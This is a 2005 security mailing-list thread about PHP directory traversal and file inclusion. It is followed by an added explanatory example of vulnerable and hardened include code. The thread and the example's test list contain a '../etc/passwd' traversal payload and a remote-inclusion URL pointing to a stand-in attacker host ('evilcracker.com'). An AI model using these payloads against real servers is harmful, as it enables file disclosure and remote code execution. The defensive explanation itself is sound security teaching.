WebApp Sec mailing list archives
Re: PHP Directory Transversal
From: "Andres Molinetti" <andymolinetti () hotmail com>
Date: Mon, 14 Mar 2005 17:02:38 +0000
It seems that the problem was that it had "safe_mode" on.... Thank you all for the replies! Cheers, Andy
From: John GALLET <john.gallet () wanadoo fr>
To: Andres Molinetti <andymolinetti () hotmail com>
CC: pen-test () securityfocus com, <webappsec () securityfocus com>
Subject: Re: PHP Directory Transversal
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)

Hi there,

> Therefore, I tried doing a
> www.example.com/static.php?page=../../../../../../etc/passwd
> but I get an error saying that file doesn't exist.
> I used the same source code in my server, and I could retrieve the
> file... what can be happening? I don't think it is under a chroot jail...

What you can or can not read depends on the configuration of php (include_path vs safe mode for example). Have a look at:
http://fr3.php.net/features.safe-mode

Now the real risk is not so much reading some source code as executing some other people's code.
www.example.com/static.php?page=http://evilcracker.com/evil_code.txt
has good chances of also getting executed, which opens the path to install any backdoor, download perl scripts/trojans, etc...

HTH
JG
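The pattern John describes (a `static.php` that passes `?page=` straight to `include`) and the two ways it goes wrong, local file inclusion via `../` and remote file inclusion via an `http://` URL, can be seen side by side in the following added example. It is not code from this thread or from the site Andy was testing; `static.php`, `resolve_page()`, the `pages/` directory and the sample requests are all assumed for illustration. The hardened version does not rely on `safe_mode` (which was removed in PHP 5.4) but on an allow-list of page names plus a `realpath()` containment check, which also rejects stream wrappers such as `http://` because they never canonicalise to a path under the base directory.

```php
<?php
// Added example, not code from the mailing-list thread.
// Hypothetical static.php showing the vulnerable pattern and a hardened resolver.

// --- Vulnerable form (what the thread discusses) ---
// include($_GET['page']) accepts "../../../../../../etc/passwd" (local file
// inclusion) and, when allow_url_fopen / allow_url_include permit it,
// "http://evilcracker.com/evil_code.txt" (remote file inclusion), whose
// body is then executed as PHP. Shown only; never called below.
function include_vulnerable(string $page): void
{
    include $page;
}

// --- Hardened form ---
// Accept only a simple page name, map it to <base>/<name>.php, canonicalise
// with realpath() and require the result to stay inside the base directory.
// Returns the canonical path, or null if the request must be refused.
function resolve_page(string $baseDir, string $page): ?string
{
    // Allow-list the shape of the name: no slashes, dots, NUL bytes or schemes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    // realpath() returns false for missing files and for wrapper URLs.
    if ($base === false || $candidate === false) {
        return null;
    }
    // Containment check: canonical path must begin with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// --- Demonstration with a constructed pages directory in the temp dir ---
$pagesDir = sys_get_temp_dir() . '/lfi_demo_pages_' . getmypid();
mkdir($pagesDir, 0700);
file_put_contents($pagesDir . '/home.php', "<?php echo \"  [home.php executed]\\n\";\n");

// Constructed requests: one legitimate, the rest the attacks from the thread
// plus a NUL-byte truncation attempt (relevant to PHP before 5.3.4).
$requests = [
    'home',
    '../../../../../../etc/passwd',
    'http://evilcracker.com/evil_code.txt',
    "home\0",
    'nonexistent',
];
foreach ($requests as $req) {
    $path = resolve_page($pagesDir, $req);
    printf("%-40s -> %s\n", addcslashes($req, "\0"), $path === null ? 'rejected' : 'included');
    if ($path !== null) {
        include $path;
    }
}

unlink($pagesDir . '/home.php');
rmdir($pagesDir);
```

Run it with `php static.php`; only `home` is included, every other request is refused before `include` sees it. On a server you still want the ini-level belt and braces: `allow_url_include = Off` (PHP 5.2 and later) and, where the application does not need it, `allow_url_fopen = Off`, so that a future coding mistake cannot turn back into the remote-inclusion case John warns about.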
Current thread:
- PHP Directory Transversal Andres Molinetti (Mar 13)
- Re: PHP Directory Transversal Felikz (Mar 13)
- Re: PHP Directory Transversal Andres Molinetti (Mar 13)
- RE: PHP Directory Transversal Mehmet Buyukozer (Mar 13)
- Re: PHP Directory Transversal Andres Molinetti (Mar 13)
- Re: PHP Directory Transversal Richard Moore (Mar 13)
- Re: PHP Directory Transversal Sarath Kummamuru (Mar 13)
- RE: PHP Directory Transversal Ravish (Mar 13)
- Re: PHP Directory Transversal David M. Zendzian (Mar 13)
- Re: PHP Directory Transversal John GALLET (Mar 18)
- Re: PHP Directory Transversal Andres Molinetti (Mar 18)
- Re: PHP Directory Transversal Alex 'CAVE' Cernat (Mar 20)
- Re: PHP Directory Transversal Andres Molinetti (Mar 18)
- Re: PHP Directory Transversal Felikz (Mar 13)